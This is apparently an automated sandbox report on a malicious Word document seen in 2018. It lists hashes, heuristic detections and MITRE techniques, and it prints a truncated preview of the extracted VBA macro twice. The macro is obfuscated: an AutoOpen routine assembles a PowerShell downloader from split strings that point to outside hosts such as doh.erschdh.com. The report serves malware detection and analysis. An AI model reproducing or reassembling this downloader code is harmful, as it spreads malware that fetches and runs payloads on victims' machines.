Office (OLE) malware analysis — malicious · 323c2d083d5a0ade

MALICIOUS

Office (OLE)

92.5 KB First seen: 2018-02-19

MD5: d2cf165ddec1e67ec5af5dd13efcc34b SHA-1: 902f6740992bd0bb7d8e500538ffe1dc9665fb29 SHA-256: 323c2d083d5a0ade4b9a265e290cc2460c4e968e963002fe9261dca97ef22d7e

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The AutoOpen macro is present and configured to execute code, likely to download and run a second-stage payload. The script attempts to construct a URL by concatenating strings, which resolves to 'https://doh.erschdh.com/ly4Ivh/?hsRI0'. This suggests a macro-based downloader attack vector.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23010 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	23010 bytes
SHA-256: `fafbddca4b62db8ef2886d028a932845a40219e3014d9d1e06afc6a987b8096b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "WKKSBPVM" Sub AutoOpen() On Error Resume Next RzNhZROkI = MmZZTwUY - Sgn(VwmflLUduj) - (4092526 - Tan(698911) / 3921852 - ChrW(JJUvw)) ihDVCwkqZ = LGLUDmJfRcWF - Sgn(UDmUrdPQwAWp) - (9680786 - Tan(3366212) / 5502709 - ChrW(jAUunjZJjRW)) AiDTbdtjS = bsNJaM - Sgn(piEV) - (6238754 - Tan(9128481) / 6632348 - ChrW(BKAlddlaG)) Application.Run "PWTJXiaCZRH", FYHzWHSzzfPdSb OlvjuMEiK = HHHlNWT - Sgn(EMBUiUr) - (4937825 - Tan(3635478) / 8641161 - ChrW(omqSGuoRZvSAnV)) bbTuZnOKJ = OEuCaoUtLj - Sgn(hQpAqYFt) - (4742490 - Tan(7369837) / 2323355 - ChrW(wHtYit)) FjidJDCAl = kaYoDAtKiujO - Sgn(QkuCq) - (9199018 - Tan(9122954) / 6386699 - ChrW(pAGArE)) End Sub Function FYHzWHSzzfPdSb() On Error Resume Next wsPLwotAlOc = NnSSI - Sgn(WMA) - (3115549 - Tan(2552050) / 3181746 - ChrW(twXcEiGP)) EHDFYRp = PdFSjzRS - Sgn(EaQHm) - (7284330 - Tan(5294771) / 2995477 - ChrW(TUwWO)) LIlWo = LaEOdaPbv - Sgn(XoNqRWviGIqE) - (7309724 - Tan(2406629) / 7294194 - ChrW(oTm)) dUjGtj = EYowIbV + Mid(EuYLphzm + "wwWzRYiADH+NUjIAQIWrTcPDcV" + rhUCmGiuh, 11, 1) YzJTrv = dlvoARiZj - Sgn(IbsuWTrjUzo) - (7491510 - Tan(2967048) / 5016080 - ChrW(VIdIuzUDZKzt)) RWiRU = UzkXi - Sgn(lUjVtmsXUtoq) - (4299998 - Tan(4185410) / 9719101 - ChrW(JBRpkoXTkZ)) VMZAMqfLu = hOVNRIZoV - Sgn(njVBbzJlUbXL) - (7905401 - Tan(8058834) / 6806436 - ChrW(pFzw)) wPGLdNhC = YtOiGIvCojpwVR + Mid(zNZtwZ + "uQGRSR+sRI'+'h0E+s'+'RI+sRIh0E/MoGJD/?httph0E+h0E://doh0E+h0Erschdh0E'+'+h0Ei.com/ly4Ivh0E+h0E/'+'h0E+h0E?hsRI+sRI0E+h0Ehtth0E+sRI+sRIh0Ep:'+'//ww'+'w.hopadih0E+shpwtnhq" + QGkHor, 7, 156) fuJCXACjqY = CPJpTBdPm - Sgn(qiwTSKBzJi) - (6096383 - Tan(4142255) / 4339386 - ChrW(oiTCK)) DffzmFIRS = cpDOUB - Sgn(wpnkScTMnbL) - (2255052 - Tan(307314) / 3532771 - ChrW(iqwjszAk)) IYEAjcFDiL = aEYCAikzQX - Sgn(IVz) - (2547210 - Tan(8574088) / 678795 - ChrW(BHHrIvFHNSnInz)) XcfMjzzi = lUMLIwjWh + Mid(hcqWRvnIoOhPzC + "aBiiJRtqEBufQlh0EDHyenh0E+h0Ev:p'+'nmuXwNLujWtwbj" + ZfdLTUrY, 15, 21) MFkNMERjqHM = kFDQ - Sgn(zomkrRvvijqv) - (4076938 - Tan(6849526) / 9933157 - ChrW(lzcfbSb)) jDzGZKZCrXA = TsYAotJ - Sgn(vEjzC) - (3354834 - Tan(1593395) / 2201562 - ChrW(nQwFwviMo)) qqzWY = IakMhMSQzsvHlW - Sgn(zQAzQTpQBn) - (258394 - Tan(6076461) / 2784786 - ChrW(wqnzuBkL)) smOlX = FKNEQMJ + Mid(MvdPOMsinpCz + "oprzLZWZVlqhREPGF+h0EU.Nd5DoyP4WnlyP4OasRI+sRIdFIh0E+h0EyP4leNd5(DHh0E+h0Ey'+'ah0EsRI+sRI+h0Esh0E+h0Efc.Nd5Toh0E+h0KsRI+'+'sRIRh+KRhESh0EKRh+KRh+h'+'0EtryPKRh+mTriVvASufszVzqjHZ" + ZjvcwsQRL, 18, 142) qzRNDnOz = zTHVGoaRIb - Sgn(OiadTWGjG) - (1330051 - Tan(3384305) / 5225417 - ChrW(oEiIHjAq)) XbIpNB = nMPRK - Sgn(PTktficnU) - (2133769 - Tan(832844) / 5402378 - ChrW(AMZj)) YHCidWvF = jhCJRJYbmBvNN - Sgn(MjQ) - (7598543 - Tan(4214893) / 4715034 - ChrW(tLRKzDHuqAOjX)) zVBuIqwMLP = CnkAJTijfZawf + Mid(MXfTKiZfjE + "uFpiMbzujhuPnJEzBRimlWE(h0EA0Gh0E,h0'+'E2oUh0E).replaCE(([cHArsRI+sRI]121'+'+sRI+sRI[cHAr]80+[cHAr]sRI+sRI52),[SKRh+KRhtrinG][cHAr]'+'96).replaCE(([cHAr]68+['+'cHAr]KRh+KR'+'h72+VAPDCRmciPPYIid" + CBHHrVvoXwMjT, 23, 156) ObvWQK = QjvB - Sgn(hqTjHJluEq) - (111505 - Tan(7109476) / 4856626 - ChrW(AAr)) chwKHqwBYHB = FcLYatG - Sgn(HiVDXwZKZGjj) - (3348499 - Tan(5043304) / 7494091 - ChrW(DGol)) joBsf = wTFZL - Sgn(ZWIQadUCDZAS) - (701861 - Tan(2215164) / 2791718 - ChrW(uRLEfpCVU)) zQmluKVlL = cYGBbUEsarHz + Mid(QZk + "jIrChmDjfmwpU[cHAr]12KRh+KsRI+sRIRh1),[StrinG][cH'+'Ar]36).rep'+'laCE(sRI+sRI([cHAKRh+KRhr]82+[csRI+sRIHAr]'+'117+sRI+sRI[sRI+sRIcsRI+sRIHKRh+KRhAr]106),[StrinG][cHAr]39'+'KRh'+'+KRh) ) KRh) -crEpLAce tjjGzw" + DHwpWlzT, 14, 189) VFklu = nlZ - Sgn(TZoNHKkTnwVIss) - (7873632 - Tan(1914229) / 4281161 - ChrW(wLZM)) COUjSJOXkKn = HIH - Sgn(FTSj) - (3612945 - Tan(9146598) / 5855012 - ChrW(pbQFwQVitnuEf)) rEBIWuqa = ZjhoOXGVjEABi - Sgn(UQD) - (2473442 - Tan(273 ... (truncated)

SHA-256: fafbddca4b62db8ef2886d028a932845a40219e3014d9d1e06afc6a987b8096b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WKKSBPVM"
Sub AutoOpen()
On Error Resume Next
RzNhZROkI = MmZZTwUY - Sgn(VwmflLUduj) - (4092526 - Tan(698911) / 3921852 - ChrW(JJUvw))
ihDVCwkqZ = LGLUDmJfRcWF - Sgn(UDmUrdPQwAWp) - (9680786 - Tan(3366212) / 5502709 - ChrW(jAUunjZJjRW))
AiDTbdtjS = bsNJaM - Sgn(piEV) - (6238754 - Tan(9128481) / 6632348 - ChrW(BKAlddlaG))
Application.Run "PWTJXiaCZRH", FYHzWHSzzfPdSb
OlvjuMEiK = HHHlNWT - Sgn(EMBUiUr) - (4937825 - Tan(3635478) / 8641161 - ChrW(omqSGuoRZvSAnV))
bbTuZnOKJ = OEuCaoUtLj - Sgn(hQpAqYFt) - (4742490 - Tan(7369837) / 2323355 - ChrW(wHtYit))
FjidJDCAl = kaYoDAtKiujO - Sgn(QkuCq) - (9199018 - Tan(9122954) / 6386699 - ChrW(pAGArE))
End Sub
Function FYHzWHSzzfPdSb()
On Error Resume Next
wsPLwotAlOc = NnSSI - Sgn(WMA) - (3115549 - Tan(2552050) / 3181746 - ChrW(twXcEiGP))
EHDFYRp = PdFSjzRS - Sgn(EaQHm) - (7284330 - Tan(5294771) / 2995477 - ChrW(TUwWO))
LIlWo = LaEOdaPbv - Sgn(XoNqRWviGIqE) - (7309724 - Tan(2406629) / 7294194 - ChrW(oTm))
dUjGtj = EYowIbV + Mid(EuYLphzm + "wwWzRYiADH+NUjIAQIWrTcPDcV" + rhUCmGiuh, 11, 1)
YzJTrv = dlvoARiZj - Sgn(IbsuWTrjUzo) - (7491510 - Tan(2967048) / 5016080 - ChrW(VIdIuzUDZKzt))
RWiRU = UzkXi - Sgn(lUjVtmsXUtoq) - (4299998 - Tan(4185410) / 9719101 - ChrW(JBRpkoXTkZ))
VMZAMqfLu = hOVNRIZoV - Sgn(njVBbzJlUbXL) - (7905401 - Tan(8058834) / 6806436 - ChrW(pFzw))
wPGLdNhC = YtOiGIvCojpwVR + Mid(zNZtwZ + "uQGRSR+sRI'+'h0E+s'+'RI+sRIh0E/MoGJD/?httph0E+h0E://doh0E+h0Erschdh0E'+'+h0Ei.com/ly4Ivh0E+h0E/'+'h0E+h0E?hsRI+sRI0E+h0Ehtth0E+sRI+sRIh0Ep:'+'//ww'+'w.hopadih0E+shpwtnhq" + QGkHor, 7, 156)
fuJCXACjqY = CPJpTBdPm - Sgn(qiwTSKBzJi) - (6096383 - Tan(4142255) / 4339386 - ChrW(oiTCK))
DffzmFIRS = cpDOUB - Sgn(wpnkScTMnbL) - (2255052 - Tan(307314) / 3532771 - ChrW(iqwjszAk))
IYEAjcFDiL = aEYCAikzQX - Sgn(IVz) - (2547210 - Tan(8574088) / 678795 - ChrW(BHHrIvFHNSnInz))
XcfMjzzi = lUMLIwjWh + Mid(hcqWRvnIoOhPzC + "aBiiJRtqEBufQlh0EDHyenh0E+h0Ev:p'+'nmuXwNLujWtwbj" + ZfdLTUrY, 15, 21)
MFkNMERjqHM = kFDQ - Sgn(zomkrRvvijqv) - (4076938 - Tan(6849526) / 9933157 - ChrW(lzcfbSb))
jDzGZKZCrXA = TsYAotJ - Sgn(vEjzC) - (3354834 - Tan(1593395) / 2201562 - ChrW(nQwFwviMo))
qqzWY = IakMhMSQzsvHlW - Sgn(zQAzQTpQBn) - (258394 - Tan(6076461) / 2784786 - ChrW(wqnzuBkL))
smOlX = FKNEQMJ + Mid(MvdPOMsinpCz + "oprzLZWZVlqhREPGF+h0EU.Nd5DoyP4WnlyP4OasRI+sRIdFIh0E+h0EyP4leNd5(DHh0E+h0Ey'+'ah0EsRI+sRI+h0Esh0E+h0Efc.Nd5Toh0E+h0KsRI+'+'sRIRh+KRhESh0EKRh+KRh+h'+'0EtryPKRh+mTriVvASufszVzqjHZ" + ZjvcwsQRL, 18, 142)
qzRNDnOz = zTHVGoaRIb - Sgn(OiadTWGjG) - (1330051 - Tan(3384305) / 5225417 - ChrW(oEiIHjAq))
XbIpNB = nMPRK - Sgn(PTktficnU) - (2133769 - Tan(832844) / 5402378 - ChrW(AMZj))
YHCidWvF = jhCJRJYbmBvNN - Sgn(MjQ) - (7598543 - Tan(4214893) / 4715034 - ChrW(tLRKzDHuqAOjX))
zVBuIqwMLP = CnkAJTijfZawf + Mid(MXfTKiZfjE + "uFpiMbzujhuPnJEzBRimlWE(h0EA0Gh0E,h0'+'E2oUh0E).replaCE(([cHArsRI+sRI]121'+'+sRI+sRI[cHAr]80+[cHAr]sRI+sRI52),[SKRh+KRhtrinG][cHAr]'+'96).replaCE(([cHAr]68+['+'cHAr]KRh+KR'+'h72+VAPDCRmciPPYIid" + CBHHrVvoXwMjT, 23, 156)
ObvWQK = QjvB - Sgn(hqTjHJluEq) - (111505 - Tan(7109476) / 4856626 - ChrW(AAr))
chwKHqwBYHB = FcLYatG - Sgn(HiVDXwZKZGjj) - (3348499 - Tan(5043304) / 7494091 - ChrW(DGol))
joBsf = wTFZL - Sgn(ZWIQadUCDZAS) - (701861 - Tan(2215164) / 2791718 - ChrW(uRLEfpCVU))
zQmluKVlL = cYGBbUEsarHz + Mid(QZk + "jIrChmDjfmwpU[cHAr]12KRh+KsRI+sRIRh1),[StrinG][cH'+'Ar]36).rep'+'laCE(sRI+sRI([cHAKRh+KRhr]82+[csRI+sRIHAr]'+'117+sRI+sRI[sRI+sRIcsRI+sRIHKRh+KRhAr]106),[StrinG][cHAr]39'+'KRh'+'+KRh) ) KRh)  -crEpLAce tjjGzw" + DHwpWlzT, 14, 189)
VFklu = nlZ - Sgn(TZoNHKkTnwVIss) - (7873632 - Tan(1914229) / 4281161 - ChrW(wLZM))
COUjSJOXkKn = HIH - Sgn(FTSj) - (3612945 - Tan(9146598) / 5855012 - ChrW(pbQFwQVitnuEf))
rEBIWuqa = ZjhoOXGVjEABi - Sgn(UQD) - (2473442 - Tan(273
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.